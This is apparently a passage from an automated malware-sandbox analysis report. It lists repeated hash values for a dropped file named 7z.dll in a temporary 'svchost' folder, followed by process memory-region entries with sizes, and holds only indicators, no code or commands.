      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • \Users\Admin\AppData\Local\Temp\svchost\7z.dll
      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • \Users\Admin\AppData\Local\Temp\svchost\7z.dll
      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • \Users\Admin\AppData\Local\Temp\svchost\7z.dll
      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • \Users\Admin\AppData\Local\Temp\svchost\7z.dll
      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • memory/8-130-0x0000000000000000-mapping.dmp
    • memory/1604-118-0x0000000000000000-mapping.dmp
    • memory/1648-191-0x00000000050C0000-0x00000000050C1000-memory.dmp
      Filesize

      4KB

    • memory/1648-208-0x0000000000F80000-0x0000000000F95000-memory.dmp
      Filesize

      84KB

    • memory/1648-207-0x00000000011C0000-0x0000000001214000-memory.dmp
      Filesize

      336KB

    • memory/1648-206-0x0000000000D00000-0x0000000000D58000-memory.dmp
      Filesize

      352KB

    • memory/1648-205-0x00000000055D0000-0x00000000055FD000-memory.dmp
      Filesize

      180KB

    • memory/1648-197-0x0000000004F80000-0x0000000004F81000-memory.dmp
      Filesize

      4KB

    • memory/1648-196-0x0000000004FF0000-0x0000000004FF1000-memory.dmp
      Filesize

      4KB

    • memory/1648-195-0x0000000005360000-0x0000000005361000-memory.dmp
      Filesize

      4KB

    • memory/1648-194-0x0000000005080000-0x0000000005081000-memory.dmp
      Filesize

      4KB

    • memory/1648-189-0x00000000006B0000-0x00000000006B1000-memory.dmp
      Filesize

      4KB

    • memory/1648-186-0x0000000000000000-mapping.dmp
    • memory/1664-150-0x0000000000000000-mapping.dmp
    • memory/1664-182-0x0000000000000000-mapping.dmp
    • memory/1840-184-0x0000000000000000-mapping.dmp
    • memory/2092-160-0x0000000000000000-mapping.dmp
    • memory/2188-142-0x0000000000000000-mapping.dmp
    • memory/2344-154-0x0000000000000000-mapping.dmp
    • memory/2384-114-0x0000000000000000-mapping.dmp
    • memory/2496-138-0x0000000000000000-mapping.dmp
    • memory/2648-219-0x0000000000401949-mapping.dmp
    • memory/2648-221-0x0000000000400000-0x0000000000405000-memory.dmp
      Filesize

      20KB

    • memory/2648-218-0x0000000000400000-0x0000000000405000-memory.dmp
      Filesize

      20KB

    • memory/2684-146-0x0000000000000000-mapping.dmp
    • memory/2692-116-0x0000000000000000-mapping.dmp
    • memory/2856-174-0x0000000000000000-mapping.dmp
    • memory/3504-122-0x0000000000000000-mapping.dmp
    • memory/3580-126-0x0000000000000000-mapping.dmp
    • memory/3704-179-0x0000000000000000-mapping.dmp
    • memory/3776-209-0x0000000000400000-0x0000000000414000-memory.dmp
      Filesize

      80KB

    • memory/3776-217-0x0000000005AE0000-0x0000000005AE1000-memory.dmp
      Filesize

      4KB

    • memory/3776-216-0x0000000003550000-0x0000000003551000-memory.dmp
      Filesize

      4KB

    • memory/3776-215-0x0000000005960000-0x0000000005961000-memory.dmp
      Filesize

      4KB

    • memory/3776-210-0x000000000040E80E-mapping.dmp
    • memory/3792-173-0x0000000006700000-0x0000000006701000-memory.dmp
      Filesize

      4KB

    • memory/3792-163-0x00000000006F0000-0x00000000006F1000-memory.dmp
      Filesize

      4KB

    • memory/3792-170-0x0000000005210000-0x0000000005211000-memory.dmp
      Filesize

      4KB

    • memory/3792-169-0x0000000002930000-0x0000000002931000-memory.dmp
      Filesize

      4KB

    • memory/3792-168-0x0000000004FB0000-0x0000000004FB1000-memory.dmp
      Filesize

      4KB

    • memory/3792-161-0x0000000000000000-mapping.dmp
    • memory/3792-166-0x0000000004F10000-0x0000000004F11000-memory.dmp
      Filesize

      4KB

    • memory/3792-167-0x0000000004F70000-0x0000000004F71000-memory.dmp
      Filesize

      4KB

    • memory/3792-172-0x00000000069F0000-0x00000000069F1000-memory.dmp
      Filesize

      4KB

    • memory/3792-165-0x00000000054B0000-0x00000000054B1000-memory.dmp
      Filesize

      4KB

    • memory/3792-171-0x0000000006360000-0x0000000006361000-memory.dmp
      Filesize

      4KB

    • memory/3844-201-0x0000000000000000-mapping.dmp
    • memory/3872-134-0x0000000000000000-mapping.dmp
    • memory/3972-177-0x0000000000000000-mapping.dmp
    • memory/3988-202-0x0000000000510000-0x0000000000511000-memory.dmp
      Filesize

      4KB

    • memory/3988-198-0x0000000000000000-mapping.dmp